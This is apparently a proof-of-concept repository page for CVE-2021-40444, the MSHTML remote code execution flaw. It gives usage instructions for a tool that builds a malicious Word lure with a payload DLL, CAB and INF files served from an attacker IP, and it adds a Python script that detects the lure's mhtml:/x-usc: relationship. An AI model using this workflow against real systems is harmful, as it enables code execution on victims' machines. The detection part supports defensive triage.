POC details: b3c68085a1bac9a6212e5ba00e1a9982cba55a53

Related vulnerability
Title: Microsoft MSHTML.DLL path traversal vulnerability (CVE-2021-40444)
Description: Microsoft MSHTML.DLL is a dynamic-link library from Microsoft used to parse HTML; applications such as IE, Outlook and Outlook Express rely on it. Microsoft MSHTML.DLL has a path traversal vulnerability: a remote attacker can craft an Office document carrying a malicious ActiveX control, lure the victim into opening it, and execute arbitrary code on the system. (MSRC tracks the same issue as a Microsoft MSHTML remote code execution vulnerability; see reference 1 below.)

Introduction
# CVE-2021-40444

## Usage

Run `setup.sh` first; it creates the directories that `gen.py` expects (`payload/` and `web/` are not in the snapshot below, so they come from this step). Once the script has run, you can run `gen.py` as in the example below:

```text
# Usage
python3 gen.py -d document/Sample.docx -p payload/payload.dll -i "http://10.10.10.10" -t html/template.html -c payload.cab -f nothing.inf -r Sample2.docx -obf 3

# Flags
-d   -> the .docx that has already been modified to contain a Bitmap object, in the header, body or footer
        (the snapshot ships document/document.docx, header.docx and footer.docx for this)
-i   -> IP address / base URL of the server the victim will fetch the .html and .cab from
-p   -> payload (.dll)
-t   -> HTML file containing the JavaScript
-r   -> file name for the modified .docx written out
-c   -> file name for the patched .cab written out
-f   -> file name for the .inf written out
-obf -> optional: obfuscation, with three modes (HTML entity, UTF-16BE, or both)
-v   -> increase output verbosity
```

## Notes

1. The `http.server` document root is the `web` directory. After `gen.py` has run it
   holds three files; the `.html` and `.cab` are what the opened document pulls from the
   `-i` address, and the `.docx` is the lure itself:

- .cab
- .html
- .docx
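A check worth running on the `.docx` that `gen.py` writes to `web`, added here as an example and not code from the H0j3n repository or its README. In the publicly documented CVE-2021-40444 chain (see the Microsoft analysis in the references), the lure document carries an external `oleObject` relationship whose target uses the `mhtml:` handler, usually followed by an `x-usc:` redirect to the HTML page; that relationship is also the artifact defenders look for when triaging suspected lures. The script below opens a `.docx` as a ZIP, walks every relationship part under `word/_rels/` (body, header and footer, since the tool can plant the object in any of the three), and flags such targets. It builds its own minimal sample documents inline so it runs offline; the `build_sample_docx` helper, its package layout and the `http://10.10.10.10` URL are assumptions mirroring the usage example above, not files from the snapshot.

```python
import io
import re
import sys
import zipfile
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional

# OOXML relationship namespace and the relationship type Word uses for OLE objects.
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                "relationships/oleObject")

# Target shapes associated with the public CVE-2021-40444 chain: the OLE object target
# starts with the mhtml: handler and usually carries an x-usc: redirect to the HTML page.
SUSPICIOUS_TARGET = re.compile(r"^mhtml:|!x-usc:", re.IGNORECASE)


def find_external_ole_targets(docx_bytes: bytes) -> List[Dict[str, str]]:
    """Return every external oleObject relationship whose target looks like the mhtml chain.

    Relationship parts for the body, headers and footers all live under word/_rels/,
    so every .rels file there is checked.
    """
    findings: List[Dict[str, str]] = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not (name.startswith("word/_rels/") and name.endswith(".rels")):
                continue
            # ElementTree is enough for this check; prefer defusedxml on untrusted input at scale.
            root = ET.fromstring(z.read(name))
            for rel in root.findall(f"{{{REL_NS}}}Relationship"):
                target = rel.get("Target", "")
                if (rel.get("Type") == OLE_REL_TYPE
                        and rel.get("TargetMode", "").lower() == "external"
                        and SUSPICIOUS_TARGET.search(target)):
                    findings.append({"part": name, "id": rel.get("Id", ""), "target": target})
    return findings


def build_sample_docx(ole_target: Optional[str]) -> bytes:
    """Constructed minimal .docx (assumption for this example, not a repo file): only the parts the check reads."""
    rels = [
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>',
        f'<Relationships xmlns="{REL_NS}">',
        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/'
        'relationships/styles" Target="styles.xml"/>',
    ]
    if ole_target is not None:
        rels.append(f'<Relationship Id="rId5" Type="{OLE_REL_TYPE}" '
                    f'Target="{ole_target}" TargetMode="External"/>')
    rels.append("</Relationships>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml",
                   '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        z.writestr("word/_rels/document.xml.rels", "\n".join(rels))
    return buf.getvalue()


if __name__ == "__main__":
    # Scan real files given on the command line (e.g. web/Sample2.docx); otherwise
    # demonstrate on the two constructed samples.
    if len(sys.argv) > 1:
        for path in sys.argv[1:]:
            with open(path, "rb") as fh:
                hits = find_external_ole_targets(fh.read())
            print(f"{path}: {'SUSPICIOUS' if hits else 'clean'}", hits)
    else:
        clean = build_sample_docx(None)
        lure = build_sample_docx("mhtml:http://10.10.10.10/template.html"
                                 "!x-usc:http://10.10.10.10/template.html")
        print("clean sample:", find_external_ole_targets(clean))
        print("lure sample: ", find_external_ole_targets(lure))
```

Run it as `python3 check_docx.py web/Sample2.docx` (script name assumed) to confirm the generated document carries the relationship, or point it at inbound attachments as a quick triage filter; a plain external target such as an `https://` link is deliberately not flagged, so the regex, not the `TargetMode`, is what distinguishes this chain.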


### Without Verbose

![without_verbose](https://github.com/H0j3n/CVE-2021-40444/blob/main/src/without_verbose.png)

### With Verbose

![with_verbose](https://github.com/H0j3n/CVE-2021-40444/blob/main/src/with_verbose.png)

## Disclaimer

This repository is for educational purposes only and is not intended for malicious use in
the wild. Any illegal use of this repository is strictly at your own responsibility and
risk.

## References

1. https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444
2. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40444
3. https://github.com/klezVirus/CVE-2021-40444
4. https://github.com/lockedbyte/CVE-2021-40444
5. https://trendmicro.com/en_us/research/21/i/remote-code-execution-zero-day--cve-2021-40444--hits-windows--tr.html
6. https://tenable.com/blog/microsoft-s-september-2021-patch-tuesday-addresses-60-cves-cve-2021-40444
7. https://news.sophos.com/en-us/2021/09/14/big-office-bug-squashed-for-september-2021s-patch-tuesday/
8. https://huntress.com/blog/cybersecurity-advisory-hackers-are-exploiting-cve-2021-40444
9. https://microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/
10. https://xret2pwn.github.io/CVE-2021-40444-Analysis-and-Exploit/
11. https://blog.sunggwanchoi.com/remote-template-injection/
12. https://youtube.com/watch?v=dgdx3QqPCuA
13. https://businessinsights.bitdefender.com/technical-advisory-zero-day-vulnerability-in-microsoft-mshtml-allows-remote-code-execution
File snapshot

```text
[4.0K] /data/pocs/b3c68085a1bac9a6212e5ba00e1a9982cba55a53
├── [4.0K] document
│   ├── [ 14K] document.docx
│   ├── [ 21K] footer.docx
│   └── [ 21K] header.docx
├── [9.3K] gen.py
├── [4.0K] html
│   └── [6.1K] template.html
├── [2.4K] README.md
├── [ 52] requirements.txt
├── [ 508] setup.sh
└── [4.0K] src
    ├── [137K] without_verbose.png
    └── [439K] with_verbose.png

3 directories, 10 files
```